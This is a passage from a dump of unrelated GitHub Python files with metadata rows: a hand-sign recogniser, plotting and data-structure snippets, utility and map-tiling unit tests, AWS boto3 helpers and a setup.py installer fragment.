self.b_dtree.n_features_ = len(features)
prev = self.b_dtree.predict(df_)
if prev == 0: ans = 'あ'
else: ans = 'う'
else:
features = ['theta2', 'a3124', 'a4312', 'a8124', 'd12']
df_ = preprocessing(df, '3', '4', '8', '12', features)
self.c_dtree.n_features_ = len(features)
prev = self.c_dtree.predict(df_)
if prev == 0: ans = 'え'
else: ans = 'お'
return ans
def main(self, image):
results = self.holistic.process(image)
self.mp_drawing.draw_landmarks(image, results.left_hand_landmarks, self.mp_holistic.HAND_CONNECTIONS)
self.mp_drawing.draw_landmarks(image, results.right_hand_landmarks, self.mp_holistic.HAND_CONNECTIONS)
right_pos = results.right_hand_landmarks
left_pos = results.left_hand_landmarks
right_ans = left_ans = '未検出'
if not right_pos is None: right_ans = self.detection(list(right_pos.landmark))
if not left_pos is None: left_ans = self.detection(list(left_pos.landmark))
h, w, _ = image.shape
print(h, w)
image = cv2pil(image)
draw = ImageDraw.Draw(image)
draw.text((0, 0), right_ans, (255,255,255), font=ImageFont.truetype('C:/Windows/Fonts/msgothic.ttc', 30))
draw.text((w-100, 0), left_ans, (255,255,255), font=ImageFont.truetype('C:/Windows/Fonts/msgothic.ttc', 30))
image = pil2cv(image)
return image
def norm_mp_pos(self, pos):
d = []
base_x = base_y = 0
for i in range(21):
if i == 0:
base_y = pos[i].y
base_x = pos[i].x
x = pos[i].x-base_x
y = pos[i].y-base_y
d.append(x)
d.append(y)
s = []
for i in range(21):
s.append(str(i)+'x')
s.append(str(i)+'y')
df = pd.DataFrame([d], columns=s)
#row_df = df.copy()
# 角度補正
y = df['9y'].values
x = df['9x'].values
rad = np.arctan2(y, x)
df['rad'] = rad
r = np.array([[np.cos(rad), -np.sin(rad)], [np.sin(rad), np.cos(rad)]])
r = r.reshape((2, 2))
for j in range(21):
df[[str(j)+'x', str(j)+'y']] = df[[str(j)+'x', str(j)+'y']] @ r
return df
class FrontEnd(object):
def __init__(self):
self.backend = BackEnd()
def main(self, cap):
while True:
start = time()
if cv2.waitKey(1) & 0xFF == ord('q'): break
ret, image = cap.read()
if not ret: continue
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
image = self.backend.main(image)
print(time()-start)
cv2.imshow('frame', cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
cv2.destroyAllWindows()
if __name__ == '__main__':
capture = cv2.VideoCapture(0)
FrontEnd().main(capture)
capture.release()
#cv2.destroyAllWindows()
| fukumoto1998/fingerspelling | word5/main.py | main.py | py | 8,588 | python | en | code | 0 | github-code | 36 |
27775098322 | import matplotlib.pyplot as plt
import numpy as np
# Create some data to plot
x = np.arange(5)
y = [2, 5, 3, 8, 10]
# Set the xticks with labels that include LaTeX and \n
xticks = [r'Label 1', r'Label$_{2}\n$with superscript $x^2$', r'Label 3', r'Label$_{4}$', r'Label 5']
plt.plot(x, y)
plt.xticks(x, xticks, rotation=0)
# Enable LaTeX rendering
plt.rc('text', usetex=True)
# Show the plot
plt.show()
| JinyangLi01/Query_refinement | Experiment/TPCH/running_time/try.py | try.py | py | 406 | python | en | code | 0 | github-code | 36 |
42733088110 | class Leaf(object):
def __init__(self, is_root=False, weight=0, char=None, parent=None, left_child=None, right_child=None):
self.is_root = is_root
self.weight = weight
self.char = char
self.parent = parent
self.left_child = left_child
self.right_child = right_child
def __str__(self):
return "Leaf {0}: is_root={1}, weight={2}, char={3}, parent={4}, left_child={5}, right_child={6}".format(
self.char, self.is_root, self.weight, self.char, bool(self.parent), bool(self.left_child), bool(self.right_child)
)
| magservel/Huffman-Vitter | Leaf.py | Leaf.py | py | 598 | python | en | code | 0 | github-code | 36 |
29524986199 | import os
import tempfile
import time
import unittest
from Tools import ValkyrieTools
class TestTools(unittest.TestCase):
def test_isFloat(self):
self.assertTrue(ValkyrieTools.isFloat('1.0'))
self.assertFalse(ValkyrieTools.isFloat(1))
def test_isInteger(self):
self.assertTrue(ValkyrieTools.isInteger(1))
self.assertFalse(ValkyrieTools.isInteger(1.3))
def test_isBoolean(self):
self.assertTrue(ValkyrieTools.isBoolean('True'))
self.assertTrue(ValkyrieTools.isBoolean('False'))
self.assertTrue(ValkyrieTools.isBoolean('Yes'))
self.assertTrue(ValkyrieTools.isBoolean('No'))
self.assertFalse(ValkyrieTools.isBoolean('1'))
self.assertFalse(ValkyrieTools.isBoolean('0'))
self.assertTrue(ValkyrieTools.isBoolean(1))
self.assertTrue(ValkyrieTools.isBoolean(0))
self.assertFalse(ValkyrieTools.isBoolean('Maybe'))
def test_isList(self):
self.assertTrue(ValkyrieTools.isList([1, 2, 3]))
self.assertFalse(ValkyrieTools.isList({'a': 1, 'b': 2}))
def test_isDict(self):
self.assertTrue(ValkyrieTools.isDict({'a': 1, 'b': 2}))
self.assertFalse(ValkyrieTools.isDict([1, 2, 3]))
def test_isJson(self):
self.assertTrue(ValkyrieTools.isJson('{"key": "value"}'))
self.assertFalse(ValkyrieTools.isJson('invalid_json'))
def test_matchDict(self):
test_dict = {
"a": "1", "b": "2", "c": "3", "d": "True", "e": "false", "f": "Yes", "g": "NO",
"h": "1.3", "i": "1.0", "j": "5", "k": "Maybe", "l": "[1, 2, 3]", "m": "{'a': 1, 'b': 2}"
}
expected_result = {'a': 1, 'b': 2, 'c': 3, 'd': True, 'e': False, 'f': True, 'g': False,
'h': 1.3, 'i': 1.0, 'j': 5, 'k': 'Maybe', 'l': [1, 2, 3], 'm': {'a': 1, 'b': 2}}
self.assertEqual(ValkyrieTools.matchDict(test_dict), expected_result)
def test_formatSize(self):
self.assertEqual(ValkyrieTools.formatSize(1000000000), '1.00 GB')
self.assertEqual(ValkyrieTools.formatSize(1000000), '1.00 MB')
self.assertEqual(ValkyrieTools.formatSize(1000), '1.00 KB')
self.assertEqual(ValkyrieTools.formatSize(500), '500.00 B')
def test_formatSpeed(self):
self.assertEqual(ValkyrieTools.formatSpeed(1000000), '1.00 MB/s')
self.assertEqual(ValkyrieTools.formatSpeed(1000), '1.00 KB/s')
self.assertEqual(ValkyrieTools.formatSpeed(500), '500.00 B/s')
def test_formatTime(self):
self.assertEqual(ValkyrieTools.formatTime(1000000), '11.57 days')
self.assertEqual(ValkyrieTools.formatTime(3600), '1.00 hours')
self.assertEqual(ValkyrieTools.formatTime(120), '2.00 minutes')
self.assertEqual(ValkyrieTools.formatTime(30), '30.00 seconds')
def test_formatNumber(self):
self.assertEqual(ValkyrieTools.formatNumber(1234567.89), '1,234,567.89')
def test_generateHwid(self):
# As this function generates a unique hardware ID, it's difficult to test for a specific result.
# You can verify that it returns a non-empty string, for example.
hwid = ValkyrieTools.generateHwid()
self.assertTrue(hwid)
def test_generateCode(self):
code_length = 32
generated_code = ValkyrieTools.generateCode(code_length)
self.assertEqual(len(generated_code), code_length)
def test_markdownHtml(self):
markdown_text = '**Hello** *World*!'
expected_html = '<b>Hello</b> <i>World</i>!'
self.assertEqual(ValkyrieTools.markdownHtml(markdown_text), expected_html)
def test_getHash(self):
data = b'This is some data to hash'
expected_md5_hash = 'fbe8ee5bbfd9ec0c6f1949ba2ac9e0d7'
expected_sha1_hash = '6acc0ca14c9cd14671c1034a36396066c00ad053'
expected_sha256_hash = '09b0d6cdcb1dc978740a4510cfbce9308423817d78447a7345bafc2950c8ff7b'
expected_sha512_hash = '6b0e3ed391e918823f5faf249c3e077ad9f5681d1d9b6c19f4e669caae3d8abefbf0bb9d443150ab62632e69554d0d22ae6be9c70334005ba0566bd6c2eff822'
self.assertEqual(ValkyrieTools.getHash(data, 'md5'), expected_md5_hash)
self.assertEqual(ValkyrieTools.getHash(data, 'sha1'), expected_sha1_hash)
self.assertEqual(ValkyrieTools.getHash(data, 'sha256'), expected_sha256_hash)
self.assertEqual(ValkyrieTools.getHash(data, 'sha512'), expected_sha512_hash)
def test_getFileHash(self):
file_content = "This is the file content."
temp_path = tempfile.gettempdir()
temp_file = tempfile.NamedTemporaryFile(dir=temp_path, delete=False)
temp_file.write(file_content.encode('utf-8'))
temp_file.close()
expected_md5_hash = '066f587e2cff2588e117fc51a522c47e'
expected_sha1_hash = '7a2dc28ce65f9b346523bd0e2f177d3b7357aba1'
expected_sha256_hash = 'dc9dbf28907435fb339baac4eb2b386538570c20ba1fcd3373f9c24d95a84ff4'
expected_sha512_hash = 'b345bc4c99404c161d67793aa412d8120a9831cfa4f307a8e8b8b290530665b17675106f5d6eebfdc0a82e43d2d4207a6485d5ff8d8dc124d0e20681d150a609'
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'md5'), expected_md5_hash)
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha1'), expected_sha1_hash)
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha256'), expected_sha256_hash)
self.assertEqual(ValkyrieTools.getFileHash(temp_file.name, 'sha512'), expected_sha512_hash)
def test_getFileData(self):
file_content = b'This is the file content.'
with tempfile.NamedTemporaryFile(delete=False) as temp_file:
temp_file.write(file_content)
temp_file_path = temp_file.name
self.assertEqual(ValkyrieTools.getFileData(temp_file_path), file_content)
def test_getFileSize(self):
file_content = b'This is the file content.'
with tempfile.NamedTemporaryFile(delete=False) as temp_file:
temp_file.write(file_content)
temp_file_path = temp_file.name
expected_file_size = len(file_content)
self.assertEqual(ValkyrieTools.getFileSize(temp_file_path), expected_file_size)
def test_getFileEdit(self):
with tempfile.NamedTemporaryFile(delete=False) as temp_file:
temp_file_path = temp_file.name
time.sleep(1)
expected_edit_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(os.path.getmtime(temp_file_path)))
self.assertEqual(ValkyrieTools.getFileEdit(temp_file_path), expected_edit_time)
def test_getFileList(self):
temp_dir = tempfile.mkdtemp()
os.makedirs(os.path.join(temp_dir, 'subdir'))
with tempfile.NamedTemporaryFile(dir=temp_dir) as temp_file1:
with tempfile.NamedTemporaryFile(dir=os.path.join(temp_dir, 'subdir')) as temp_file2:
expected_file_list = [temp_file1.name.replace("\\", "/"), temp_file2.name.replace("\\", "/")]
self.assertEqual(ValkyrieTools.getFileList(temp_dir), expected_file_list)
if __name__ == '__main__':
unittest.main()
| ValkyFischer/ValkyrieUtils | unittests/test_tools.py | test_tools.py | py | 7,154 | python | en | code | 0 | github-code | 36 |
2521012317 | import configparser
import html
from pathlib import Path
from pprint import pformat
from urllib.parse import urlparse
import boto3
import botocore.model
import botocore.utils
from IPython.core.display import HTML
from jinja2 import Environment, FileSystemLoader
from pygments import highlight
from pygments.formatters import Terminal256Formatter
from pygments.lexers import PythonLexer
AWS_US_REGIONS = ["us-east-1", "us-east-2", "us-west-1", "us-west-2"]
AWS_CA_REGIONS = ["ca-central-1"]
AWS_SA_REGIONS = ["sa-east-1"]
AWS_EU_REGIONS = ["eu-west-3", "eu-west-2", "eu-west-1", "eu-central-1"]
AWS_ASIA_REGIONS = [
"ap-south-1",
"ap-northeast-2",
"ap-northeast-1",
"ap-southeast-1",
"ap-southeast-2",
]
AWS_ALL_REGIONS = (
AWS_US_REGIONS
+ AWS_CA_REGIONS
+ AWS_SA_REGIONS
+ AWS_EU_REGIONS
+ AWS_ASIA_REGIONS
)
AWS_SERVICES_CONDENSED = [
"cloudfront",
"cloudtrail",
"ec2",
"s3",
"elb",
"iam",
"rds",
"route53",
"route53domains",
"sns",
"sqs",
"sts",
]
AWS_SERVICES_DATA = [
"athena",
"rds",
"dynamodb",
"elasticache",
"redshift",
"neptune",
"dms",
]
AWS_SERVICES_COMPUTE = ["ec2", "lambda", "stepfunctions"]
AWS_SERVICES_OPS = ["cloudformation", "opsworks", "opsworkscm", "ssm"]
AWS_SERVICES_MGMT = [
"cloudtrail",
"cloudwatch",
"budgets",
"config",
"cur",
"events",
"iam",
"logs",
"organizations",
"pricing",
"servicecatalog",
"ssm",
"sts",
]
def list_profile_names(profile_exclusions=[], keyword_exclusions=[]):
config = configparser.ConfigParser()
config.read(Path("~/", ".aws", "config").expanduser())
profile_names = [
section.replace("profile ", "") for section in config.sections()
]
exclude = profile_exclusions + [
x for x in profile_names for kw in keyword_exclusions if kw in x
]
profile_list = [x for x in profile_names if x not in exclude]
return profile_list
def list_regions():
sess = boto3.session.Session(profile_name=list_profile_names()[0])
ec2 = sess.client("ec2", "us-east-1")
regions = ec2.describe_regions().get("Regions")
return [region.get("RegionName") for region in regions]
def list_services_for_region(region):
sess = boto3.session.Session(
profile_name=list_profile_names()[0], region_name=region
)
return sess.get_available_services()
def pprint_color(obj):
print(highlight(pformat(obj), PythonLexer(), Terminal256Formatter()))
def render_template(template_file, **kwargs):
templateLoader = FileSystemLoader(searchpath="./")
templateEnv = Environment(loader=templateLoader)
template = templateEnv.get_template(template_file)
outputText = template.render(**kwargs)
return outputText
def get_shape_data(client, shape_for):
shape = client.meta.service_model.shape_for(shape_for)
shape_return = {
botocore.model.StringShape: lambda x: dict(
enum=x.enum, docs=x.documentation
),
botocore.model.StructureShape: lambda x: dict(
name=x.name,
required=x.required_members,
members={
k: get_shape_data(client, v.name) for k, v in x.members.items()
},
docs=x.documentation,
),
botocore.model.ListShape: lambda x: get_shape_data(
client, x.member.name
),
botocore.model.MapShape: lambda x: dict(
type=str(type(x)), name=x.name
),
botocore.model.Shape: lambda x: dict(type=x.name),
}
return shape_return.get(type(shape), lambda x: dict())(shape)
def generate_cloudtrail_reference(region="us-east-1", svc_include=None):
"""
Generates a dictionary object containing a quick reference of event sources
and event function names for every AWS service or only the services included
in `svc_include`.
"""
if svc_include is None:
svc_include = []
session = boto3.session.Session(region_name=region)
services = session.get_available_services()
if len(svc_include) > 0:
services = {
svc_name: session.client(svc_name)
for svc_name in services
if svc_name in svc_include
}
else:
services = {
svc_name: session.client(svc_name)
for svc_name in services
}
data = {
svc_name: dict(
EventSource=urlparse(client.meta.endpoint_url).netloc.replace(
f"{region}.", ""
),
EventNames=client.meta.service_model.operation_names,
)
for svc_name, client in services.items()
}
return data
def generate_json_input_for(method):
client = method.__self__
method_name = client.meta.method_to_api_mapping[method.__func__.__name__]
arg_gen = botocore.utils.ArgumentGenerator()
input_model = arg_gen.generate_skeleton(
client.meta.service_model.operation_model(method_name).input_shape
)
return input_model
def generate_html_for(method, param_name=None):
page_src = ""
client = method.__self__
method_name = client.meta.method_to_api_mapping[method.__func__.__name__]
if param_name is None:
for key, val in client.meta.service_model.operation_model(
method_name
).input_shape.members.items():
docs = (
client.meta.service_model.operation_model(method_name)
.input_shape.members[key]
.documentation
)
page_src += "<h3>{0}</h3><h4>{1}</h4>".format(
key, html.escape(str(val))
)
page_src += "<div>"
if len(docs) > 0:
page_src += docs
page_src += "<pre>{}</pre>".format(
json.dumps(
get_shape_data(client, val.name), indent=2, sort_keys=True
)
)
page_src += "<div>"
else:
param = client.meta.service_model.operation_model(
method_name
).input_shape.members[param_name]
docs = param.documentation
page_src += "<h3>{0}</h3><h4>{1}</h4>".format(
param_name, html.escape(str(param))
)
page_src += "<div>"
if len(docs) > 0:
page_src += docs
page_src += "<pre>{}</pre>".format(
json.dumps(
get_shape_data(client, param.name), indent=2, sort_keys=True
)
)
page_src += "<div>"
return HTML(page_src)
| kernelpanek/jupyterlab-starter-notebooks | helper/aws_functions.py | aws_functions.py | py | 6,575 | python | en | code | 0 | github-code | 36 |
17881412655 | class Node:
def __init__(self, value):
self.value = value
self.next = None
class Queue:
def __init__(self):
self.front = None
self.rear = None
self.length = 0
print("The queue has been initialised")
def enqueue(self, value):
newNode = Node(value)
if(self.length==0):
self.front = self.rear = newNode
else:
newNode.next = self.rear
self.rear = newNode
self.length += 1
def dequeue(self):
if(self.length==0):
print("No elements in the queue")
elif(self.length==1):
print("dequeued : ", self.front.value)
self.front = self.rear = None
self.length = 0
else:
temp = self.rear
while(temp.next!=self.front):
temp = temp.next
self.front = temp
self.front.next = None
self.length -= 1
def traverseQueue(self):
if(self.length==0):
print("No elements in the queue")
else:
queueList = []
temp = self.rear
while(temp!=None):
queueList.append(temp.value)
temp = temp.next
print(queueList[::-1])
queue = Queue()
queue.enqueue(5)
queue.traverseQueue()
queue.dequeue()
queue.dequeue()
queue.traverseQueue()
queue.enqueue(43)
queue.enqueue(56)
queue.enqueue(86)
queue.traverseQueue()
queue.dequeue()
queue.traverseQueue()
| qdotdash/Competitive_Coding | Data Structures and Algorithms - Udemy/Stack and Queue/QueueLinkedList.py | QueueLinkedList.py | py | 1,213 | python | en | code | 0 | github-code | 36 |
11578008291 | # 5648**
import sys
nums = "".join(list(map(str, sys.stdin.readlines()))).split() # 입력 문제: re.split은 구분자 사이에 아무것도 없을 경우 빈 문자열이 들어감..
reverses = []
for i in range(1, int(nums[0])+1):
reverses.append(int(nums[i][::-1])) #문자열 뒤집기: str[::-1]
for j in sorted(reverses):
print(j)
# cnt, *nums = sys.stdin.read().split()
# for i in range(int(cnt)):
# nums[i] = nums[i][::-1]
# nums = list(map(int, nums))
# print(*sorted(nums), sep="\n")
| starcat37/Algorithm | BOJ/Silver/5648.py | 5648.py | py | 516 | python | ko | code | 0 | github-code | 36 |
656371734 | #!/usr/bin/env python
import json
import pickle
import os
import pytest
import numpy as np
import mercantile as merc
import inspect
import rasterio
import untiler
from untiler.scripts import tile_utils
def test_templating_good_jpg():
print("")
expectedMatch = 'tarbase/jpg/\d+/\d+/\d+.jpg'
expectedInterp = 'tarbase/jpg/%s/%s/%s.jpg'
template = 'tarbase/jpg/{z}/{x}/{y}.jpg'
matchTemplate, interpTemplate, separator = tile_utils.parse_template(template)
assert matchTemplate == expectedMatch
assert interpTemplate == expectedInterp
assert separator == "/"
print("# OK - %s " % (inspect.stack()[0][3]))
def test_templating_good_png():
expectedMatch = 'tarbase/jpg/\d+/\d+/\d+.png'
expectedInterp = 'tarbase/jpg/%s/%s/%s.png'
template = 'tarbase/jpg/{z}/{x}/{y}.png'
matchTemplate, interpTemplate, separator = tile_utils.parse_template(template)
assert separator == "/"
assert matchTemplate == expectedMatch
assert interpTemplate == expectedInterp
print("# OK - %s " % (inspect.stack()[0][3]))
def test_templating_fails():
template = 'tarbase/jpg/{x}/{y}/{z}.jpg'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
template = 'tarbase/jpg/{z}/{x}/{y}.poop'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
template = 'tarbase/jpg/z/x/y.jpg'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template():
template = '{z}-{x}-{y}-source-date-tileid.tif'
template, sceneTemplate, separator = tile_utils.parse_template(template)
assert separator == '-'
assert sceneTemplate == '%s-%s-%s-source-date-tileid.tif'
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template_numeric():
template = '{z}-{x}-{y}-source-2015-xyz.tif'
template, sceneTemplate, separator = tile_utils.parse_template(template)
assert separator == '-'
assert sceneTemplate == '%s-%s-%s-source-2015-xyz.tif'
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template_fails():
template = '{x}-{y}-source-2015-xyz.tif'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
print("# OK - %s " % (inspect.stack()[0][3]))
def tests_templating_scene_template_separator_fails():
template = '{z}/{x}-{y}-source-2015-xyz.tif'
with pytest.raises(ValueError):
tile_utils.parse_template(template)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def inputTilenames():
with open('tests/fixtures/tar_list.json') as ofile:
return json.load(ofile)
@pytest.fixture
def expectedTileList():
with open('tests/expected/tile_list.json') as ofile:
return np.array(json.load(ofile))
def test_parse_tiles(inputTilenames, expectedTileList):
matchTemplate = r'3857_9_83_202_20130517_242834/jpg/\d+/\d+/\d+.jpg'
tiler = tile_utils.TileUtils()
output_tiles = np.array([
t for t in tiler.get_tiles(inputTilenames, matchTemplate, '/')
])
assert np.array_equal(output_tiles, expectedTileList)
tweakedTilenames = [f.replace('/', '?') for f in inputTilenames]
output_tiles = np.array([
t for t in tiler.get_tiles(tweakedTilenames, matchTemplate, '/')
])
assert len(output_tiles) == 0
assert np.array_equal(output_tiles, expectedTileList) == False
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedTiles19():
with open('tests/expected/tile_list_19.json') as ofile:
return json.load(ofile)
def test_get_xys(expectedTileList, expectedTiles19):
tiler = tile_utils.TileUtils()
tiles, minX, minY, maxX, maxY = tiler.select_tiles(expectedTileList, 19)
assert np.array_equal(tiles, np.array(expectedTiles19['tiles']))
assert minX == expectedTiles19['minX']
assert maxX == expectedTiles19['maxX']
assert minY == expectedTiles19['minY']
assert maxY == expectedTiles19['maxY']
print("# OK - %s " % (inspect.stack()[0][3]))
def test_get_xys_invalid_tiles():
tiler = tile_utils.TileUtils()
badtiles = np.array([0])
with pytest.raises(ValueError):
tiles, minX, minY, maxX, maxY = tiler.select_tiles(badtiles, 19)
badtiles = np.array([[1,2], [1,2]])
with pytest.raises(ValueError):
tiles, minX, minY, maxX, maxY = tiler.select_tiles(badtiles, 19)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_get_xys_invalid_zoom(expectedTileList):
tiler = tile_utils.TileUtils()
with pytest.raises(ValueError):
tiles, minX, minY, maxX, maxY = tiler.select_tiles(expectedTileList, 20)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_affine():
ul, lr = (-18848759.67889818, 19225441.354287542), (-18846313.693993058, 19222995.3693824)
expected = np.array([0.5971642834774684, 0.0, -18848759.67889818, 0.0, -0.5971642834820159, 19225441.354287542, 0.0, 0.0, 1.0])
assert np.array_equal(np.array(untiler.make_affine(4096, 4096, ul, lr)), expected)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedMeta():
with open('tests/expected/src_meta.pkl', mode='rb') as pklfile:
return pickle.load(pklfile)
# SKIP UNTIL I DEAL W/ DECIMAL ISSUES
def test_src_meta_making(expectedMeta):
bounds = merc.bounds(10, 10, 10)
src_meta = untiler.make_src_meta(bounds, 4096)
for k, e in zip(sorted(src_meta), sorted(expectedMeta)):
assert k == e
# assert src_meta[k] == expectedMeta[e]
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_window():
expected = ((23808, 24064), (1024, 1280))
window = untiler.make_window(102, 343, 98, 250, 256)
assert window == expected
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_window_fails():
with pytest.raises(ValueError):
untiler.make_window(102, 13, 98, 50, 256)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_upsampling():
rShape = 2 ** int(np.random.rand() * 5 + 5)
rUp = 2 ** int(np.random.rand() * 3 + 1)
toFaux, frFaux = untiler.affaux(rUp)
test = np.zeros((3, rShape, rShape))
outputUp = untiler.upsample(test, rUp, frFaux, toFaux)
assert outputUp.shape == (3, rUp * rShape, rUp * rShape)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedAffauxs():
return np.array([1., 0., 0., 0., -1., 0., 0., 0., 1.]), np.array([4., 0., 0., 0., -4., 0., 0., 0., 1.])
def test_affaux(expectedAffauxs):
toFaux, frFaux = untiler.affaux(4)
expectedTo, expectedFr = expectedAffauxs
assert np.array_equal(toFaux, expectedTo)
assert np.array_equal(frFaux, expectedFr)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_grey_imagedata():
inputData = np.zeros((1, 256, 256), dtype=np.uint8)
imdata = untiler.make_image_array(inputData, 256)
assert imdata.shape == (4, 256, 256)
assert np.array_equal(imdata[-1], np.zeros((256, 256), dtype=np.uint8) + 255)
assert np.array_equal(imdata[0], imdata[1])
assert np.array_equal(imdata[1], imdata[2])
print("# OK - %s " % (inspect.stack()[0][3]))
def test_make_rgb_imagedata():
inputData = np.zeros((3, 256, 256), dtype=np.uint8)
imdata = untiler.make_image_array(inputData, 256)
assert imdata.shape == (4, 256, 256)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_rgb():
expectedLength = 65536
expectedDepth = 3
expectedSize = 256
inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
assert imdata.shape == (expectedSize, expectedSize, expectedDepth,)
assert imsize == expectedLength
assert depth == expectedDepth
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_grey():
expectedLength = 65536
expectedDepth = 1
expectedSize = 256
inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
assert imdata.shape == (expectedSize, expectedSize, expectedDepth,)
assert imsize == expectedLength
assert depth == expectedDepth
print("# OK - %s " % (inspect.stack()[0][3]))
# With rasterio, this test no longer applies - still, checking for failure
def test_make_grey_depth2_fails():
inputData = np.zeros((256, 256), dtype=np.uint8)
with pytest.raises(ValueError):
imdata = untiler.make_image_array(inputData, 256)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_random():
expectedSize = int(np.random.rand() * 256)
expectedLength = expectedSize ** 2
expectedDepth = int(np.random.rand() * 5)
inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
assert imdata.shape == (expectedSize, expectedSize, expectedDepth,)
assert imsize == expectedLength
assert depth == expectedDepth
print("# OK - %s " % (inspect.stack()[0][3]))
def test_load_imagedata_fails():
expectedLength = 65535
expectedDepth = 1
expectedSize = 256
inputData = np.zeros((expectedLength, expectedDepth), dtype=np.uint8)
with pytest.raises(ValueError):
imdata, imsize, depth = untiler.load_image_data(inputData, expectedSize)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def tilesShort():
with open('tests/fixtures/tile_list_short.json') as ofile:
return np.array(json.load(ofile))
@pytest.fixture
def expectedSuper():
with open('tests/expected/tile_parents.json') as ofile:
return np.array(json.load(ofile))
def test_create_supertiles(tilesShort, expectedSuper):
tiler = tile_utils.TileUtils()
superTiles = tiler.get_super_tiles(tilesShort, 14)
assert tilesShort.shape == superTiles.shape
assert np.array_equal(superTiles, expectedSuper)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_create_supertiles_fails(tilesShort):
tiler = tile_utils.TileUtils()
with pytest.raises(ValueError):
superTiles = tiler.get_super_tiles(tilesShort, 20)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def uniqueExpected():
return np.array([[14, 2684, 6464], [14, 2685, 6464], [14, 2686, 6464], [14, 2687, 6464]])
def test_find_unique_tiles(expectedSuper, uniqueExpected):
tiler = tile_utils.TileUtils()
uniqueTiles = tiler.get_unique_tiles(expectedSuper)
assert np.array_equal(uniqueTiles, uniqueExpected)
print("# OK - %s " % (inspect.stack()[0][3]))
@pytest.fixture
def expectedZooms():
with open('tests/expected/expected_zoom_tiles.json') as ofile:
return json.load(ofile)
def test_find_zoom_tiles(expectedTileList, expectedZooms):
tiler = tile_utils.TileUtils()
superTiles = tiler.get_super_tiles(expectedTileList, 13)
for t, e in zip(tiler.get_unique_tiles(superTiles), expectedZooms):
maxZ, maxZcoverage = tiler.get_zoom_tiles(expectedTileList, superTiles, t)
assert np.array_equal(maxZ, e['maxZ'])
assert np.array_equal(maxZcoverage, e['maxZcoverage'])
print("# OK - %s " % (inspect.stack()[0][3]))
def test_find_zoom_tiles_fail(expectedTileList):
tiler = tile_utils.TileUtils()
superTiles = tiler.get_super_tiles(expectedTileList, 13)[:-10]
with pytest.raises(ValueError):
maxZ, maxZcoverage = tiler.get_zoom_tiles(expectedTileList, superTiles, superTiles[0])
print("# OK - %s " % (inspect.stack()[0][3]))
def test_find_zoom_tiles_floor_fail(expectedTileList):
### a subset of tiles that don't have any tiles less than z 17
tiles = expectedTileList[:1000]
tiler = tile_utils.TileUtils()
superTiles = tiler.get_super_tiles(tiles, 12)
with pytest.raises(ValueError):
tiler.get_zoom_tiles(tiles, superTiles, superTiles[0], 17)
print("# OK - %s " % (inspect.stack()[0][3]))
def test_find_zoom_tiles_floor(expectedTileList):
### a subset of tiles that have tiles less than z 17
tiles = expectedTileList[1000:]
tiler = tile_utils.TileUtils()
superTiles = tiler.get_super_tiles(tiles, 13)
zMaxtiles, zFloortiles = tiler.get_zoom_tiles(tiles, superTiles, superTiles[-1], 17)
assert zMaxtiles.shape == (848, 3)
assert zFloortiles.shape == (68, 3)
assert zFloortiles[:, 0].min() == 17 and zFloortiles[:, 0].max() == 17
print("# OK - %s " % (inspect.stack()[0][3]))
def test_logger():
rstring = ''.join(np.random.randint(0,9, 10000).astype(str))
rfile = '/tmp/%s.log'% (''.join(np.random.randint(0,9, 5).astype(str)))
with open(rfile, 'w') as loggerfile:
untiler.logwriter(loggerfile, rstring)
with open(rfile) as ofile:
logged = ofile.read()
assert rstring + '\n' == logged
os.remove(rfile)
print("# OK - %s " % (inspect.stack()[0][3]))
| mapbox/untiler | tests/test_untiler_funcs.py | test_untiler_funcs.py | py | 13,079 | python | en | code | 39 | github-code | 36 |
24426403241 | #!/usr/bin/env python
import sys
import os
from distutils.core import setup
from distutils.command.install import install, write_file
from distutils.command.install_egg_info import to_filename, safe_name
from functools import reduce
class new_install(install):
def initialize_options(self):
install.initialize_options(self)
def run(self):
install.run(self)
# hack to remove old module
old_path = os.path.join(self.install_libbase, "playitslowly", "playitslowly.py")
for p in (old_path + x for x in ("o", "c", "")):
if os.path.exists(p):
self.execute(os.unlink, (p, ), "Removing old file %r" % p)
# write install-info
basename = "%s-py%s.install-info" % (
to_filename(safe_name(self.distribution.get_name())),
sys.version[:3]
)
install_info = os.path.join(self.install_libbase, basename)
outputs = self.get_outputs()
if self.root: # strip any package prefix
root_len = len(self.root)
for counter in range(len(outputs)):
outputs[counter] = outputs[counter][root_len:]
self.execute(write_file,
(install_info, outputs),
"writing install-info to '%s'" % install_info)
def ls_r(dir):
def do_reduce(a, b):
files = []
for f in b[2]:
files.append(os.path.join(b[0], f))
a.append((b[0], files))
return a
